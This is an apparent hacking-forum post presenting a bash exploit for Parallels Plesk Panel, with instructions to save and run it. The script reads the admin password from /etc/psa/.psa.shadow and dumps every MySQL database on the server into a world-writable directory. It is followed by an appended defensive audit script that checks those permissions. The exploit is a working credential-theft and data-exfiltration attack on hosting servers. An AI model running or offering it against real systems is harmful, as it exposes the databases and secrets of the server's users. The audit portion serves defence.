Parallels Plesk Panel => Linux local MySQL backup generate exploit



Today I've seen another exploit in Parallels Plesk, coded by Cold Z3ro. It gives you the right to make a MySQL backup of all server databases,

and also access to old backups taken before.


Code of 3xpl0it :

Code:
#!/bin/bash
# Title:    Parallels Plesk Panel => Linux local MySQL backup generate exploit
# Version:  10.0 and possibly below and higher
# Vendor :  http://www.parallels.com/
# About  :  Parallels Plesk Panel is the preferred choice for hosting service providers,
#           web designers, and website owners.
# Author:   Cold z3ro
# Web:      http://www.hackteach.org
# Exploit : attacker could infiltrate/intrusion to make MySQL database backup, also access to old backups taken before.

# dumpdir automatically generated when install Plesk with 0777.
dumpdir='/var/dbdumps/'
date=$(/bin/date +%HHours%m-%d-%Y)
mkdir -p $dumpdir$date
echo "Creating MySQL backup in $dumpdir$date .."

for i in `mysql -u admin -p$(cat /etc/psa/.psa.shadow) -Ns -e "show databases" | egrep -v "^(psa|mysql|horde|information_schema|phpmyadmin.*)"`; do
    mysqldump --opt $i > $dumpdir$date/$i.sql
    echo "Created: $i.sql"
done
echo "Backups located in $dumpdir$date"
# fetching the databases
ls -1 $dumpdir$date

See the attachment.

save it as exploit.sh

then just use this command to run it

Code:
sh exploit.sh


Attached File(s)
.txt  Exploit.txt (Size: 1 KB / Downloads: 6)
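
The script above depends on two permission conditions: a dump directory that any local account can write to, and an admin password file that the calling account can read. The following audit checks both; it is an added example, not part of the original post or exploit, and the function names (`mode_of`, `other_has`, `audit_dump_exposure`) are hypothetical.

```sh
#!/bin/sh
# Added example, not from the original post. Defaults are the paths named in
# the post; pass other paths as $1 (dump directory) and $2 (secret file).

# Octal permission bits of a path (GNU stat, as found on Linux hosts).
mode_of() {
    stat -c '%a' "$1"
}

# Succeeds if the "other" class holds the given bit (4 = read, 2 = write).
other_has() {
    mode=$(mode_of "$1") || return 1
    [ $(( 0$mode & $2 )) -ne 0 ]
}

# Print one line per risky permission; return status = number of findings.
audit_dump_exposure() {
    dumpdir=$1; secret=$2; findings=0
    if [ -d "$dumpdir" ]; then
        if other_has "$dumpdir" 2; then
            echo "FINDING: $dumpdir is world-writable (mode $(mode_of "$dumpdir"))"
            findings=$((findings + 1))
        fi
        # Dumps already on disk that any local account can read.
        n=$(find "$dumpdir" -type f -name '*.sql' -perm -004 | wc -l | tr -d ' ')
        if [ "$n" -gt 0 ]; then
            echo "FINDING: $n world-readable .sql dump(s) under $dumpdir"
            findings=$((findings + 1))
        fi
    else
        echo "INFO: $dumpdir not present"
    fi
    if [ -e "$secret" ]; then
        if other_has "$secret" 4; then
            echo "FINDING: $secret is world-readable (mode $(mode_of "$secret"))"
            findings=$((findings + 1))
        fi
    else
        echo "INFO: $secret not present"
    fi
    return "$findings"
}

audit_dump_exposure "${1:-/var/dbdumps}" "${2:-/etc/psa/.psa.shadow}" \
    || echo "Review: restrict the dump directory and secret file to their owner"
```

A non-zero exit status from `audit_dump_exposure` is the number of findings, so the function can be dropped into a scheduled host check.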
